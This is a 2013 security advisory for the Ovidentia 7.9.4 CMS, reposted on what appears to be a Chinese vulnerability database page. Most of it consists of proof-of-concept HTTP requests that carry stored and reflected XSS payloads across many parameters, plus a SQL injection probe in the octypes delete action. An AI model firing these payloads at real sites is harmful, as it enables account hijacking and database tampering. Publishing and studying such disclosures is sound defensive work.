Ovidentia 7.9.4 Cross Site Scripting / SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044578 漏洞类型
发布时间 2013-08-22 更新时间 2013-08-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080177
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
?
Ovidentia 7.9.4 Multiple Remote Vulnerabilities


Vendor: Cantico
Product web page: http://www.ovidentia.org
Affected version: 7.9.4

Summary: Ovidentia is both a content management system (CMS) and
a collaborative environment (Groupware).

Desc: Input passed via several parameters is not properly sanitized
before being returned to the user or used in SQL queries. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL
code and HTML/script code in a user's browser session in context of
an affected site.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.7
           MySQL 5.5.25a


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience



Advisory ID: ZSL-2013-5154
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5154.php



08.08.2013

---

============================================================
#1 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

tg	users
idx	Create
pos	A
grp	
widget_filepicker_job_uid[]	52154a53cc0de
user[nickname]	"><script>alert(1);</script>
user[password1]	pass123
user[password2]	pass123
user[notifyuser]	0
user[sendpwd]	0
user[sn]	Testingusio
user[mn]	M
user[givenname]	Testa
user[email]	"><script>alert(2);</script>


============================================================
#2 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

user[id]	2
tg	user
idx	Modify
item	2
pos	
grp	
widget_filepicker_job_uid[]	52154bde9410a
user[nickname]	test
user[setpwd]	0
user[password1]	
user[password2]	
user[sendpwd]	0
user[sn]	"><script>alert(3);</script>
user[mn]	M
user[givenname]	"><script>alert(4);</script>
user[email]	lab@zeroscience.mk

GET http://localhost/ovidentia/index.php?tg=user&idx=Modify&item=2&pos=&grp= HTTP/1.1


============================================================
#3 - Stored XSS
------------------------------------------------------------

POST http://localhost/ovidentia/index.php HTTP/1.1

Submit2	Update
idx	modify
item	1
ovmldetail	"><script>alert(5);</script>
ovmlembedded	"><script>alert(6);</script>
tg	admoc
update	ovmldb


============================================================
#4 - Reflected XSSs
------------------------------------------------------------

GET http://localhost/ovidentia/index.php?tg=users&bupd="><script>alert(7);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=addon/widgets/groups&idx=get&id_parent="><script>alert(8);</script>&uid=widget_acl99&levels=2&id_delegation=0
GET http://localhost/ovidentia/index.php?tg=admoc&idx=addoc&item="><script>alert(9);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A"><script>alert(10);</script>&grp=&sSearchText= HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A&grp=&sSearchText="><script>alert(11);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=admfm&idx=modify&fid=1"><script>alert(12);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?idx=options&tg=calopt&urla=javascript:prompt(13); HTTP/1.1
GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1_</script><script>prompt(14)</script>&iIdProject=-1&tg=usrTskMgr
GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1&iIdProject=0_</script><script>prompt(15)</script>&tg=usrTskMgr 
GET http://localhost/ovidentia/index.php?ids=1"onmouseover=prompt(16)>&idx=hpriv&tg=topman


============================================================
#5 - SQL Injection
------------------------------------------------------------

GET http://localhost/ovidentia/index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2